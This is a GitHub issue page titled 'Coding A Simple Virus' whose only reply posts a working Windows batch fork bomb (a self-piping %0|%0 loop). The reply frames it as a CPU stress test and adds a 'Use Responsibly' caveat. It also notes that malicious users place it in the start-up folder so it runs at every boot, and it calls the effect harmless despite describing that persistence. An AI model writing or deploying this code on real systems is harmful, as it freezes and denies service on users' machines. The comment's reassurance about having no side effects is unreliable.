Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Coding A Simple Virus #370

Open
tejan-singh opened this issue Nov 17, 2020 · 1 comment
Open

Coding A Simple Virus #370

tejan-singh opened this issue Nov 17, 2020 · 1 comment

Comments

@tejan-singh
Copy link
Contributor

No description provided.

@treneth333
Copy link

Use Responsibly

@echo off
:Start
%0|%0
Goto :start

It can be used to test the strength of a CPU measured by how long the program runs before the system freezes. In that state one just needs to restart the computer and continue on with no side effects.

But since it is considered a fork bomb malicious users may plant this file in the start-up folder causing it to run each time it's started.

Linux is utilized to fix it by allowing someone to access the infected OS's files and remove the trouble maker.

It's one of the simplest tools for stress testing and inadvertently is one of the easiest to write viruses

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants